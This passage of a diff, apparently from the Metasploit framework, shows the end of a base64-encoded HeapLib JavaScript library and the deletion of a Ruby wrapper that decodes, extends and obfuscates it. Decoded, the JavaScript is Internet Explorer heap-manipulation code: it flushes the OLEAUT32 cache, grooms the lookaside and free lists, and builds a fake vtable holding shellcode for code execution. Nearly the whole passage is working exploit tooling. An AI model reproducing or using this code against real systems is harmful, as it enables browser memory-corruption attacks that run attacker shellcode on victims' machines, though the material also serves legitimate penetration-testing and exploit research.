ZXByZXNlbnRhdGlvbiBpbg0KLy8gbWVtb3J5LiBUaGlzIGZ1bmN0aW9uIHVz
|
||||
ZXMgdGhlIGhlYXAuDQovLw0KLy8gQXJndW1lbnRzOg0KLy8gICAgYWRkciAt
|
||||
IGludGVnZXIgcmVwcmVzZW50YXRpb24gb2YgdGhlIGFkZHJlc3MNCi8vDQoN
|
||||
CmhlYXBMaWIuaWUucHJvdG90eXBlLmFkZHIgPSBmdW5jdGlvbihhZGRyKSB7
|
||||
DQogICAgcmV0dXJuIHVuZXNjYXBlKCIldSIgKyB0aGlzLmhleChhZGRyICYg
|
||||
MHhGRkZGLCA0KSArICIldSIgKyB0aGlzLmhleCgoYWRkciA+PiAxNikgJiAw
|
||||
eEZGRkYsIDQpKTsNCn0NCg0KDQovLw0KLy8gQWxsb2NhdGVzIGEgYmxvY2sg
|
||||
b2YgYSBzcGVjaWZpZWQgc2l6ZSB3aXRoIHRoZSBPTEVBVVQzMiBhbGxvYyBm
|
||||
dW5jdGlvbi4NCi8vDQovLyBBcmd1bWVudHM6DQovLyAgICBhcmcgLSBzaXpl
|
||||
IG9mIHRoZSBuZXcgYmxvY2sgaW4gYnl0ZXMsIG9yIGEgc3RyaW5nIHRvIHN0
|
||||
cmR1cA0KLy8gICAgdGFnIC0gYSB0YWcgaWRlbnRpZnlpbmcgdGhlIG1lbW9y
|
||||
eSBibG9jayAob3B0aW9uYWwpDQovLw0KDQpoZWFwTGliLmllLnByb3RvdHlw
|
||||
ZS5hbGxvY09sZWF1dDMyID0gZnVuY3Rpb24oYXJnLCB0YWcpIHsNCg0KICAg
|
||||
IHZhciBzaXplOw0KDQogICAgLy8gQ2FsY3VsYXRlIHRoZSBhbGxvY2F0aW9u
|
||||
IHNpemUNCiAgICBpZiAodHlwZW9mIGFyZyA9PSAic3RyaW5nIiB8fCBhcmcg
|
||||
aW5zdGFuY2VvZiBTdHJpbmcpDQogICAgICAgIHNpemUgPSA0ICsgYXJnLmxl
|
||||
bmd0aCoyICsgMjsgICAgLy8gbGVuICsgc3RyaW5nIGRhdGEgKyBudWxsIHRl
|
||||
cm1pbmF0b3INCiAgICBlbHNlDQogICAgICAgIHNpemUgPSBhcmc7DQoNCiAg
|
||||
ICAvLyBNYWtlIHN1cmUgdGhhdCB0aGUgc2l6ZSBpcyB2YWxpZA0KICAgIGlm
|
||||
ICgoc2l6ZSAmIDB4ZikgIT0gMCkNCiAgICAgICAgdGhyb3cgIkFsbG9jYXRp
|
||||
b24gc2l6ZSAiICsgc2l6ZSArICIgbXVzdCBiZSBhIG11bHRpcGxlIG9mIDE2
|
||||
IjsNCg0KICAgIC8vIENyZWF0ZSBhbiBhcnJheSBmb3IgdGhpcyB0YWcgaWYg
|
||||
ZG9lc24ndCBhbHJlYWR5IGV4aXN0DQogICAgaWYgKHRoaXMubWVtW3RhZ10g
|
||||
PT09IHVuZGVmaW5lZCkNCiAgICAgICAgdGhpcy5tZW1bdGFnXSA9IG5ldyBB
|
||||
cnJheSgpOw0KDQogICAgaWYgKHR5cGVvZiBhcmcgPT0gInN0cmluZyIgfHwg
|
||||
YXJnIGluc3RhbmNlb2YgU3RyaW5nKSB7DQogICAgICAgIC8vIEFsbG9jYXRl
|
||||
IGEgbmV3IGJsb2NrIHdpdGggc3RyZHVwIG9mIHRoZSBzdHJpbmcgYXJndW1l
|
||||
bnQNCiAgICAgICAgdGhpcy5tZW1bdGFnXS5wdXNoKGFyZy5zdWJzdHIoMCwg
|
||||
YXJnLmxlbmd0aCkpOw0KICAgIH0NCiAgICBlbHNlIHsNCiAgICAgICAgLy8g
|
||||
QWxsb2NhdGUgdGhlIGJsb2NrDQogICAgICAgIHRoaXMubWVtW3RhZ10ucHVz
|
||||
aCh0aGlzLnBhZGRpbmcoKGFyZy02KS8yKSk7DQogICAgfQ0KfQ0KDQoNCi8v
|
||||
DQovLyBGcmVlcyBhbGwgbWVtb3J5IGJsb2NrcyBtYXJrZWQgd2l0aCBhIHNw
|
||||
ZWNpZmljIHRhZyB3aXRoIHRoZSBPTEVBVVQzMiBtZW1vcnkNCi8vIGFsbG9j
|
||||
YXRvci4NCi8vDQovLyBBcmd1bWVudHM6DQovLyAgICB0YWcgLSBhIHRhZyBp
|
||||
ZGVudGlmeWluZyB0aGUgZ3JvdXAgb2YgYmxvY2tzIHRvIGJlIGZyZWVkDQov
|
||||
Lw0KDQpoZWFwTGliLmllLnByb3RvdHlwZS5mcmVlT2xlYXV0MzIgPSBmdW5j
|
||||
dGlvbih0YWcpIHsNCg0KICAgIGRlbGV0ZSB0aGlzLm1lbVt0YWddOw0KICAg
|
||||
IA0KICAgIC8vIFJ1biB0aGUgZ2FyYmFnZSBjb2xsZWN0b3INCiAgICBDb2xs
|
||||
ZWN0R2FyYmFnZSgpOw0KfQ0KDQoNCi8vDQovLyBUaGUgSlNjcmlwdCBpbnRl
|
||||
cnByZXRlciB1c2VzIHRoZSBPTEVBVVQzMiBtZW1vcnkgYWxsb2NhdG9yIGZv
|
||||
ciBhbGwgc3RyaW5nDQovLyBhbGxvY2F0aW9ucy4gVGhpcyBhbGxvY2F0b3Ig
|
||||
c3RvcmVzIGZyZWVkIGJsb2NrcyBpbiBhIGNhY2hlIGFuZCByZXVzZXMgdGhl
|
||||
bQ0KLy8gZm9yIGxhdGVyIGFsbG9jYXRpb25zLiBUaGUgY2FjaGUgY29uc2lz
|
||||
dHMgb2YgNCBiaW5zLCBlYWNoIHN0b3JpbmcgdXAgdG8gNg0KLy8gYmxvY2tz
|
||||
LiBFYWNoIGJpbiBob2xkcyBibG9ja3Mgb2YgYSBjZXJ0YWluIHNpemUgcmFu
|
||||
Z2U6DQovLw0KLy8gICAgMCAtIDMyDQovLyAgICAzMyAtIDY0DQovLyAgICA2
|
||||
NSAtIDI1Ng0KLy8gICAgMjU3IC0gMzI3NjgNCi8vDQovLyBXaGVuIGEgYmxv
|
||||
Y2sgaXMgZnJlZWQgYnkgdGhlIE9MRUFVVDMyIGZyZWUgZnVuY3Rpb24sIGl0
|
||||
IGlzIHN0b3JlZCBpbiBvbmUgb2YNCi8vIHRoZSBiaW5zLiBJZiB0aGUgYmlu
|
||||
IGlzIGZ1bGwsIHRoZSBzbWFsbGVzdCBibG9jayBpbiB0aGUgYmluIGlzIGZy
|
||||
ZWVkIHdpdGgNCi8vIFJ0bEZyZWVIZWFwKCkgYW5kIGlzIHJlcGxhY2VkIHdp
|
||||
dGggdGhlIG5ldyBibG9jay4gQ2h1bmtzIGxhcmdlciB0aGFuIDMyNzY4DQov
|
||||
LyBieXRlcyBhcmUgbm90IGNhY2hlZCBhbmQgYXJlIGZyZWVkIGRpcmVjdGx5
|
||||
Lg0KLy8NCi8vIFRvIGZsdXNoIHRoZSBjYWNoZSwgd2UgbmVlZCB0byBmcmVl
|
||||
IDYgYmxvY2tzIG9mIHRoZSBtYXhpbXVtIHNpemUgZm9yIGVhY2gNCi8vIGJp
|
||||
bi4gVGhlIG1heGltdW0gc2l6ZSBibG9ja3Mgd2lsbCBwdXNoIG91dCBhbGwg
|
||||
c21hbGxlciBibG9ja3MgZnJvbSB0aGUNCi8vIGNhY2hlLiBUaGVuIHdlIGFs
|
||||
bG9jYXRlIHRoZSBtYXhpbXVtIHNpemUgYmxvY2tzIGFnYWluLCBsZWF2aW5n
|
||||
IHRoZSBjYWNoZQ0KLy8gZW1wdHkuDQovLw0KLy8gWW91IG5lZWQgdG8gY2Fs
|
||||
bCB0aGlzIGZ1bmN0aW9uIG9uY2UgdG8gYWxsb2NhdGUgdGhlIG1heGltdW0g
|
||||
c2l6ZSBibG9ja3MNCi8vIGJlZm9yZSB5b3UgY2FuIHVzZSBpdCB0byBmbHVz
|
||||
aCB0aGUgY2FjaGUuDQovLw0KDQpoZWFwTGliLmllLnByb3RvdHlwZS5mbHVz
|
||||
aE9sZWF1dDMyID0gZnVuY3Rpb24oKSB7DQoNCiAgICB0aGlzLmRlYnVnKCJG
|
||||
bHVzaGluZyB0aGUgT0xFQVVUMzIgY2FjaGUiKTsNCg0KICAgIC8vIEZyZWUg
|
||||
dGhlIG1heGltdW0gc2l6ZSBibG9ja3MgYW5kIHB1c2ggb3V0IGFsbCBzbWFs
|
||||
bGVyIGJsb2Nrcw0KDQogICAgdGhpcy5mcmVlT2xlYXV0MzIoIm9sZWF1dDMy
|
||||
Iik7DQogICAgDQogICAgLy8gQWxsb2NhdGUgdGhlIG1heGltdW0gc2l6ZWQg
|
||||
YmxvY2tzIGFnYWluLCBlbXB0eWluZyB0aGUgY2FjaGUNCg0KICAgIGZvciAo
|
||||
dmFyIGkgPSAwOyBpIDwgNjsgaSsrKSB7DQogICAgICAgIHRoaXMuYWxsb2NP
|
||||
bGVhdXQzMigzMiwgIm9sZWF1dDMyIik7DQogICAgICAgIHRoaXMuYWxsb2NP
|
||||
bGVhdXQzMig2NCwgIm9sZWF1dDMyIik7DQogICAgICAgIHRoaXMuYWxsb2NP
|
||||
bGVhdXQzMigyNTYsICJvbGVhdXQzMiIpOw0KICAgICAgICB0aGlzLmFsbG9j
|
||||
T2xlYXV0MzIoMzI3NjgsICJvbGVhdXQzMiIpOw0KICAgIH0NCn0NCg0KDQov
|
||||
Lw0KLy8gQWxsb2NhdGVzIGEgYmxvY2sgb2YgYSBzcGVjaWZpZWQgc2l6ZSB3
|
||||
aXRoIHRoZSBzeXN0ZW0gbWVtb3J5IGFsbG9jYXRvci4gQQ0KLy8gY2FsbCB0
|
||||
byB0aGlzIGZ1bmN0aW9uIGlzIGVxdWl2YWxlbnQgdG8gYSBjYWxsIHRvIEhl
|
||||
YXBBbGxvYygpLiBJZiB0aGUgZmlyc3QNCi8vIGFyZ3VtZW50IGlzIGEgbnVt
|
||||
YmVyLCBpdCBzcGVjaWZpZXMgdGhlIHNpemUgb2YgdGhlIG5ldyBibG9jaywg
|
||||
d2hpY2ggaXMNCi8vIGZpbGxlZCB3aXRoICJBIiBjaGFyYWN0ZXJzLiBJZiB0
|
||||
aGUgYXJndW1lbnQgaXMgYSBzdHJpbmcsIGl0cyBkYXRhIGlzIGNvcGllZA0K
|
||||
Ly8gaW50byBhIG5ldyBibG9jayBvZiBzaXplIGFyZy5sZW5ndGggKiAyICsg
|
||||
Ni4gSW4gYm90aCBjYXNlcyB0aGUgc2l6ZSBvZiB0aGUNCi8vIG5ldyBibG9j
|
||||
ayBtdXN0IGJlIGEgbXVsdGlwbGUgb2YgMTYgYW5kIG5vdCBlcXVhbCB0byAz
|
||||
MiwgNjQsIDI1NiBvciAzMjc2OC4NCi8vDQovLyBBcmd1bWVudHM6DQovLyAg
|
||||
ICBhcmcgLSBzaXplIG9mIHRoZSBtZW1vcnkgYmxvY2sgaW4gYnl0ZXMsIG9y
|
||||
IGEgc3RyaW5nIHRvIHN0cmR1cA0KLy8gICAgdGFnIC0gYSB0YWcgaWRlbnRp
|
||||
ZnlpbmcgdGhlIG1lbW9yeSBibG9jayAob3B0aW9uYWwpDQovLw0KDQpoZWFw
|
||||
TGliLmllLnByb3RvdHlwZS5hbGxvYyA9IGZ1bmN0aW9uKGFyZywgdGFnKSB7
|
||||
DQoNCiAgICB2YXIgc2l6ZTsNCg0KICAgIC8vIENhbGN1bGF0ZSB0aGUgYWxs
|
||||
b2NhdGlvbiBzaXplDQogICAgaWYgKHR5cGVvZiBhcmcgPT0gInN0cmluZyIg
|
||||
fHwgYXJnIGluc3RhbmNlb2YgU3RyaW5nKQ0KICAgICAgICBzaXplID0gNCAr
|
||||
IGFyZy5sZW5ndGgqMiArIDI7ICAgIC8vIGxlbiArIHN0cmluZyBkYXRhICsg
|
||||
bnVsbCB0ZXJtaW5hdG9yDQogICAgZWxzZQ0KICAgICAgICBzaXplID0gYXJn
|
||||
Ow0KDQogICAgLy8gTWFrZSBzdXJlIHRoYXQgdGhlIHNpemUgaXMgdmFsaWQN
|
||||
CiAgICBpZiAoc2l6ZSA9PSAzMiB8fCBzaXplID09IDY0IHx8IHNpemUgPT0g
|
||||
MjU2IHx8IHNpemUgPT0gMzI3NjgpDQogICAgICAgIHRocm93ICJBbGxvY2F0
|
||||
aW9uIHNpemVzICIgKyBzaXplICsgIiBjYW5ub3QgYmUgZmx1c2hlZCBvdXQg
|
||||
b2YgdGhlIE9MRUFVVDMyIGNhY2hlIjsNCg0KICAgIC8vIEFsbG9jYXRlIHRo
|
||||
ZSBibG9jayB3aXRoIHRoZSBPTEVBVVQzMiBhbGxvY2F0b3INCiAgICB0aGlz
|
||||
LmFsbG9jT2xlYXV0MzIoYXJnLCB0YWcpOw0KfQ0KDQoNCi8vDQovLyBGcmVl
|
||||
cyBhbGwgbWVtb3J5IGJsb2NrcyBtYXJrZWQgd2l0aCBhIHNwZWNpZmljIHRh
|
||||
ZyB3aXRoIHRoZSBzeXN0ZW0gbWVtb3J5DQovLyBhbGxvY2F0b3IuIEEgY2Fs
|
||||
bCB0byB0aGlzIGZ1bmN0aW9uIGlzIGVxdWl2YWxlbnQgdG8gYSBjYWxsIHRv
|
||||
IEhlYXBGcmVlKCkuDQovLw0KLy8gQXJndW1lbnRzOg0KLy8gICAgdGFnIC0g
|
||||
YSB0YWcgaWRlbnRpZnlpbmcgdGhlIGdyb3VwIG9mIGJsb2NrcyB0byBiZSBm
|
||||
cmVlZA0KLy8NCg0KaGVhcExpYi5pZS5wcm90b3R5cGUuZnJlZSA9IGZ1bmN0
|
||||
aW9uKHRhZykgew0KDQogICAgLy8gRnJlZSB0aGUgYmxvY2tzIHdpdGggdGhl
|
||||
IE9MRUFVVDMyIGZyZWUgZnVuY3Rpb24NCiAgICB0aGlzLmZyZWVPbGVhdXQz
|
||||
Mih0YWcpOw0KDQogICAgLy8gRmx1c2ggdGhlIE9MRUFVVDMyIGNhY2hlDQog
|
||||
ICAgdGhpcy5mbHVzaE9sZWF1dDMyKCk7DQp9DQoNCg0KLy8NCi8vIFJ1bnMg
|
||||
dGhlIGdhcmJhZ2UgY29sbGVjdG9yIGFuZCBmbHVzaGVzIHRoZSBPTEVBVVQz
|
||||
MiBjYWNoZS4gQ2FsbCB0aGlzDQovLyBmdW5jdGlvbiBiZWZvcmUgYmVmb3Jl
|
||||
IHVzaW5nIGFsbG9jKCkgYW5kIGZyZWUoKS4NCi8vDQoNCmhlYXBMaWIuaWUu
|
||||
cHJvdG90eXBlLmdjID0gZnVuY3Rpb24oKSB7DQoNCiAgICB0aGlzLmRlYnVn
|
||||
KCJSdW5uaW5nIHRoZSBnYXJiYWdlIGNvbGxlY3RvciIpOw0KICAgIENvbGxl
|
||||
Y3RHYXJiYWdlKCk7DQoNCiAgICB0aGlzLmZsdXNoT2xlYXV0MzIoKTsNCn0N
|
||||
Cg0KDQovLw0KLy8gQWRkcyBibG9ja3Mgb2YgdGhlIHNwZWNpZmllZCBzaXpl
|
||||
IHRvIHRoZSBmcmVlIGxpc3QgYW5kIG1ha2VzIHN1cmUgdGhleSBhcmUNCi8v
|
||||
IG5vdCBjb2FsZXNjZWQuIFRoZSBoZWFwIG11c3QgYmUgZGVmcmFnbWVudGVk
|
||||
IGJlZm9yZSBjYWxsaW5nIHRoaXMgZnVuY3Rpb24uDQovLyBJZiB0aGUgc2l6
|
||||
ZSBvZiB0aGUgbWVtb3J5IGJsb2NrcyBpcyBsZXNzIHRoYW4gMTAyNCwgeW91
|
||||
IGhhdmUgdG8gbWFrZSBzdXJlDQovLyB0aGF0IHRoZSBsb29rYXNpZGUgaXMg
|
||||
ZnVsbC4NCi8vDQovLyBBcmd1bWVudHM6DQovLyAgICBhcmcgICAgLSBzaXpl
|
||||
IG9mIHRoZSBuZXcgYmxvY2sgaW4gYnl0ZXMsIG9yIGEgc3RyaW5nIHRvIHN0
|
||||
cmR1cA0KLy8gICAgY291bnQgIC0gaG93IG1hbnkgZnJlZSBibG9ja3MgdG8g
|
||||
YWRkIHRvIHRoZSBsaXN0IChkZWZhdWx0cyB0byAxKQ0KLy8NCg0KaGVhcExp
|
||||
Yi5pZS5wcm90b3R5cGUuZnJlZUxpc3QgPSBmdW5jdGlvbihhcmcsIGNvdW50
|
||||
KSB7DQoNCiAgICB2YXIgY291bnQgPSAoY291bnQgPyBjb3VudCA6IDEpOw0K
|
||||
DQogICAgZm9yICh2YXIgaSA9IDA7IGkgPCBjb3VudDsgaSsrKSB7DQogICAg
|
||||
ICAgIHRoaXMuYWxsb2MoYXJnKTsNCiAgICAgICAgdGhpcy5hbGxvYyhhcmcs
|
||||
ICJmcmVlTGlzdCIpOw0KICAgIH0NCiAgICB0aGlzLmFsbG9jKGFyZyk7DQoN
|
||||
CiAgICB0aGlzLmZyZWUoImZyZWVMaXN0Iik7DQp9DQoNCg0KLy8NCi8vIEFk
|
||||
ZCBibG9ja3Mgb2YgdGhlIHNwZWNpZmllZCBzaXplIHRvIHRoZSBsb29rYXNp
|
||||
ZGUuIFRoZSBsb29rYXNpZGUgbXVzdCBiZQ0KLy8gZW1wdHkgYmVmb3JlIGNh
|
||||
bGxpbmcgdGhpcyBmdW5jdGlvbi4NCi8vDQovLyBBcmd1bWVudHM6DQovLyAg
|
||||
ICBhcmcgICAgLSBzaXplIG9mIHRoZSBuZXcgYmxvY2sgaW4gYnl0ZXMsIG9y
|
||||
IGEgc3RyaW5nIHRvIHN0cmR1cA0KLy8gICAgY291bnQgIC0gaG93IG1hbnkg
|
||||
YmxvY2tzIHRvIGFkZCB0byB0aGUgbG9va2FzaWRlIChkZWZhdWx0cyB0byAx
|
||||
KQ0KLy8NCg0KaGVhcExpYi5pZS5wcm90b3R5cGUubG9va2FzaWRlID0gZnVu
|
||||
Y3Rpb24oYXJnLCBjb3VudCkgew0KDQogICAgdmFyIHNpemU7DQoNCiAgICAv
|
||||
LyBDYWxjdWxhdGUgdGhlIGFsbG9jYXRpb24gc2l6ZQ0KICAgIGlmICh0eXBl
|
||||
b2YgYXJnID09ICJzdHJpbmciIHx8IGFyZyBpbnN0YW5jZW9mIFN0cmluZykN
|
||||
CiAgICAgICAgc2l6ZSA9IDQgKyBhcmcubGVuZ3RoKjIgKyAyOyAgICAvLyBs
|
||||
ZW4gKyBzdHJpbmcgZGF0YSArIG51bGwgdGVybWluYXRvcg0KICAgIGVsc2UN
|
||||
CiAgICAgICAgc2l6ZSA9IGFyZzsNCg0KICAgIC8vIE1ha2Ugc3VyZSB0aGF0
|
||||
IHRoZSBzaXplIGlzIHZhbGlkDQogICAgaWYgKChzaXplICYgMHhmKSAhPSAw
|
||||
KQ0KICAgICAgICB0aHJvdyAiQWxsb2NhdGlvbiBzaXplICIgKyBzaXplICsg
|
||||
IiBtdXN0IGJlIGEgbXVsdGlwbGUgb2YgMTYiOw0KDQogICAgaWYgKHNpemUr
|
||||
OCA+PSAxMDI0KQ0KICAgICAgICB0aHJvdygiTWF4aW11bSBsb29rYXNpZGUg
|
||||
YmxvY2sgc2l6ZSBpcyAxMDA4IGJ5dGVzIik7DQoNCiAgICB2YXIgY291bnQg
|
||||
PSAoY291bnQgPyBjb3VudCA6IDEpOw0KDQogICAgZm9yICh2YXIgaSA9IDA7
|
||||
IGkgPCBjb3VudDsgaSsrKQ0KICAgICAgICB0aGlzLmFsbG9jKGFyZywgImxv
|
||||
b2thc2lkZSIpOw0KDQogICAgdGhpcy5mcmVlKCJsb29rYXNpZGUiKTsNCn0N
|
||||
Cg0KDQovLw0KLy8gUmV0dXJuIHRoZSBhZGRyZXNzIG9mIHRoZSBoZWFkIG9m
|
||||
IHRoZSBsb29rYXNpZGUgbGlua2VkIGxpc3QgZm9yIGJsb2NrcyBvZiBhDQov
|
||||
LyBzcGVjaWZpZWQgc2l6ZS4gVXNlcyB0aGUgaGVhcEJhc2UgcGFyYW1ldGVy
|
||||
IGZyb20gdGhlIGhlYXBMaWIuaWUgY29uc3RydWN0b3IuDQovLw0KLy8gQXJn
|
||||
dW1lbnRzOg0KLy8gICAgYXJnIC0gc2l6ZSBvZiB0aGUgbmV3IGJsb2NrIGlu
|
||||
IGJ5dGVzLCBvciBhIHN0cmluZyB0byBzdHJkdXANCi8vDQoNCmhlYXBMaWIu
|
||||
aWUucHJvdG90eXBlLmxvb2thc2lkZUFkZHIgPSBmdW5jdGlvbihhcmcpDQp7
|
||||
DQogICAgdmFyIHNpemU7DQoNCiAgICAvLyBDYWxjdWxhdGUgdGhlIGFsbG9j
|
||||
YXRpb24gc2l6ZQ0KICAgIGlmICh0eXBlb2YgYXJnID09ICJzdHJpbmciIHx8
|
||||
IGFyZyBpbnN0YW5jZW9mIFN0cmluZykNCiAgICAgICAgc2l6ZSA9IDQgKyBh
|
||||
cmcubGVuZ3RoKjIgKyAyOyAgICAvLyBsZW4gKyBzdHJpbmcgZGF0YSArIG51
|
||||
bGwgdGVybWluYXRvcg0KICAgIGVsc2UNCiAgICAgICAgc2l6ZSA9IGFyZzsN
|
||||
Cg0KICAgIC8vIE1ha2Ugc3VyZSB0aGF0IHRoZSBzaXplIGlzIHZhbGlkDQog
|
||||
ICAgaWYgKChzaXplICYgMHhmKSAhPSAwKQ0KICAgICAgICB0aHJvdyAiQWxs
|
||||
b2NhdGlvbiBzaXplICIgKyBzaXplICsgIiBtdXN0IGJlIGEgbXVsdGlwbGUg
|
||||
b2YgMTYiOw0KDQogICAgaWYgKHNpemUrOCA+PSAxMDI0KQ0KICAgICAgICB0
|
||||
aHJvdygiTWF4aW11bSBsb29rYXNpZGUgYmxvY2sgc2l6ZSBpcyAxMDA4IGJ5
|
||||
dGVzIik7DQoNCiAgICAvLyBUaGUgbG9va2FoZWFkIGFycmF5IHN0YXJ0cyBh
|
||||
dCBoZWFwQmFzZSArIDB4Njg4LiBJdCBjb250YWlucyBhIDQ4IGJ5dGUNCiAg
|
||||
ICAvLyBzdHJ1Y3R1cmUgZm9yIGVhY2ggYmxvY2sgc2l6ZSArIGhlYWRlciBz
|
||||
aXplIGluIDggYnl0ZSBpbmNyZW1lbnRzLg0KDQogICAgcmV0dXJuIHRoaXMu
|
||||
aGVhcEJhc2UgKyAweDY4OCArICgoc2l6ZSs4KS84KSo0ODsNCn0NCg0KDQov
|
||||
Lw0KLy8gUmV0dXJucyBhIGZha2UgdnRhYmxlIHRoYXQgY29udGFpbnMgc2hl
|
||||
bGxjb2RlLiBUaGUgY2FsbGVyIHNob3VsZCBmcmVlIHRoZQ0KLy8gdnRhYmxl
|
||||
IHRvIHRoZSBsb29rYXNpZGUgYW5kIHVzZSB0aGUgYWRkcmVzcyBvZiB0aGUg
|
||||
bG9va2FzaWRlIGhlYWQgYXMgYW4NCi8vIG9iamVjdCBwb2ludGVyLiBXaGVu
|
||||
IHRoZSB2dGFibGUgaXMgdXNlZCwgdGhlIGFkZHJlc3Mgb2YgdGhlIG9iamVj
|
||||
dCBtdXN0IGJlDQovLyBpbiBlYXggYW5kIHRoZSBwb2ludGVyIHRvIHRoZSB2
|
||||
dGFibGUgbXVzdCBiZSBpbiBlY3guIEFueSB2aXJ0dWFsIGZ1bmN0aW9uDQov
|
||||
LyBjYWxsIHRocm91Z2ggdGhlIHZ0YWJsZSBmcm9tIGVjeCs4IHRvIGVjeCsw
|
||||
eDgwIHdpbGwgcmVzdWx0IGluIHNoZWxsY29kZQ0KLy8gZXhlY3V0aW9uLiBU
|
||||
aGlzIGZ1bmN0aW9uIHVzZXMgdGhlIGhlYXAuDQovLw0KLy8gQXJndW1lbnRz
|
||||
Og0KLy8gICAgc2hlbGxjb2RlIC0gc2hlbGxjb2RlIHN0cmluZw0KLy8gICAg
|
||||
am1wZWN4ICAgIC0gYWRkcmVzcyBvZiBhIGptcCBlY3ggb3IgZXF1aXZhbGVu
|
||||
dCBpbnN0cnVjdGlvbg0KLy8gICAgc2l6ZSAgICAgIC0gc2l6ZSBvZiB0aGUg
|
||||
dnRhYmxlIHRvIGdlbmVyYXRlIChkZWZhdWx0cyB0byAxMDA4IGJ5dGVzKQ0K
|
||||
Ly8NCg0KaGVhcExpYi5pZS5wcm90b3R5cGUudnRhYmxlID0gZnVuY3Rpb24o
|
||||
c2hlbGxjb2RlLCBqbXBlY3gsIHNpemUpIHsNCg0KICAgIHZhciBzaXplID0g
|
||||
KHNpemUgPyBzaXplIDogMTAwOCk7DQoNCiAgICAvLyBNYWtlIHN1cmUgdGhl
|
||||
IHNpemUgaXMgdmFsaWQNCiAgICBpZiAoKHNpemUgJiAweGYpICE9IDApDQog
|
||||
ICAgICAgIHRocm93ICJWdGFibGUgc2l6ZSAiICsgc2l6ZSArICIgbXVzdCBi
|
||||
ZSBhIG11bHRpcGxlIG9mIDE2IjsNCg0KICAgIGlmIChzaGVsbGNvZGUubGVu
|
||||
Z3RoKjIgPiBzaXplLTEzOCkNCiAgICAgICAgdGhyb3coIk1heGltdW0gc2hl
|
||||
bGxjb2RlIGxlbmd0aCBpcyAiICsgKHNpemUtMTM4KSArICIgYnl0ZXMiKTsN
|
||||
Cg0KICAgIC8vIEJ1aWxkIHRoZSBmYWtlIHZ0YWJsZSB0aGF0IHdpbGwgZ28g
|
||||
b24gdGhlIGxvb2thc2lkZSBsaXN0DQogICAgLy8NCiAgICAvLyBsb29rYXNp
|
||||
ZGUgcHRyICBqbXAgKzEyNCAgYWRkciBvZiBqbXAgZWN4ICBzdWIgW2VheF0s
|
||||
IGFsKjIgIHNoZWxsY29kZSAgICAgICBudWxsDQogICAgLy8gNCBieXRlcyAg
|
||||
ICAgICAgNCBieXRlcyAgIDEyNCBieXRlcyAgICAgICAgNCBieXRlcyAgICAg
|
||||
ICAgICBzaXplLTEzOCBieXRlcyAgMiBieXRlcw0KDQogICAgdmFyIHZ0YWJs
|
||||
ZSA9IHVuZXNjYXBlKCIldTkwOTAldTdjZWIiKSAgIC8vIG5vcCwgbm9wLCBq
|
||||
bXAgKyAxMjQNCg0KICAgIGZvciAodmFyIGkgPSAwOyBpIDwgMTI0LzQ7IGkr
|
||||
KykNCiAgICAgICAgdnRhYmxlICs9IHRoaXMuYWRkcihqbXBlY3gpOw0KDQog
|
||||
ICAgLy8gSWYgdGhlIHZ0YWJsZSBpcyB0aGUgb25seSBlbnRyeSBvbiB0aGUg
|
||||
bG9va2FzaWRlLCB0aGUgZmlyc3QgNCBieXRlcyB3aWxsDQogICAgLy8gYmUg
|
||||
MDAgMDAgMDAgMDAsIHdoaWNoIGRpc2Fzc2VtYmxlcyBhcyB0d28gYWRkIFtl
|
||||
YXhdLCBhbCBpbnN0cnVjdGlvbnMuDQogICAgLy8gVGhlIGptcCBlY3ggdHJh
|
||||
bXBvbGluZSB3aWxsIGp1bXAgYmFjayB0byB0aGUgYmVnaW5uaW5nIG9mIHRo
|
||||
ZSB2dGFibGUgYW5kDQogICAgLy8gZXhlY3V0ZSB0aGUgYWRkIFtlYXhdLCBh
|
||||
bCBpbnN0cnVjdGlvbnMuIFdlIG5lZWQgdG8gdXNlIHR3byBzdWIgW2VheF0s
|
||||
IGFsDQogICAgLy8gaW5zdHJ1Y3Rpb25zIHRvIGZpeCB0aGUgaGVhcC4NCg0K
|
||||
ICAgIHZ0YWJsZSArPSB1bmVzY2FwZSgiJXUwMDI4JXUwMDI4IikgKyAgICAv
|
||||
LyB0d28gc3ViIFtlYXhdLCBhbCBpbnN0cnVjdGlvbnMNCiAgICAgICAgICAg
|
||||
ICAgc2hlbGxjb2RlICsgaGVhcC5wYWRkaW5nKChzaXplLTEzOCkvMiAtIHNo
|
||||
ZWxsY29kZS5sZW5ndGgpOw0KDQogICAgcmV0dXJuIHZ0YWJsZTsNCn0NCg==
|
|
@ -1,107 +0,0 @@
|
|||
# -*- coding: binary -*-
|
||||
require 'rex/text'
|
||||
require 'rex/exploitation/obfuscatejs'
|
||||
require 'rex/exploitation/jsobfu'
|
||||
|
||||
module Rex
|
||||
module Exploitation
|
||||
|
||||
#
|
||||
# Encapsulates the generation of the Alexander Sotirov's HeapLib javascript
|
||||
# stub
|
||||
#
|
||||
class HeapLib
|
||||
|
||||
#
|
||||
# The source file to load the javascript from
|
||||
#
|
||||
JavascriptFile = File.join(File.dirname(__FILE__), "heaplib.js.b64")
|
||||
|
||||
#
|
||||
# The list of symbols found in the file. This is used to dynamically
|
||||
# replace contents.
|
||||
#
|
||||
SymbolNames =
|
||||
{
|
||||
"Methods" =>
|
||||
[
|
||||
"vtable",
|
||||
"lookasideAddr",
|
||||
"lookaside",
|
||||
"freeList",
|
||||
"gc",
|
||||
"flushOleaut32",
|
||||
"freeOleaut32",
|
||||
"allocOleaut32",
|
||||
"free",
|
||||
"alloc",
|
||||
"addr",
|
||||
"hex",
|
||||
"round",
|
||||
"paddingStr",
|
||||
"padding",
|
||||
"debugBreak",
|
||||
"debugHeap",
|
||||
"debug",
|
||||
],
|
||||
"Classes" =>
|
||||
[
|
||||
{ 'Namespace' => "heapLib", 'Class' => "ie" }
|
||||
],
|
||||
"Namespaces" =>
|
||||
[
|
||||
"heapLib"
|
||||
]
|
||||
}
|
||||
|
||||
#
|
||||
# Initializes the heap library javascript
|
||||
#
|
||||
def initialize(custom_js = '', opts = {})
|
||||
load_js(custom_js, opts)
|
||||
end
|
||||
|
||||
#
|
||||
# Return the replaced version of the javascript
|
||||
#
|
||||
def to_s
|
||||
@js
|
||||
end
|
||||
|
||||
protected
|
||||
|
||||
#
|
||||
# Loads the raw javascript from the source file and strips out comments
|
||||
#
|
||||
def load_js(custom_js, opts = {})
|
||||
|
||||
# Grab the complete javascript
|
||||
File.open(JavascriptFile) do |f|
|
||||
@js = f.read
|
||||
end
|
||||
|
||||
# Decode the text
|
||||
@js = Rex::Text.decode_base64(@js)
|
||||
|
||||
# Append the real code
|
||||
@js += "\n" + custom_js
|
||||
|
||||
if opts[:newobfu]
|
||||
# Obfuscate the javascript using the new lexer method
|
||||
js_obfu = JSObfu.new(@js)
|
||||
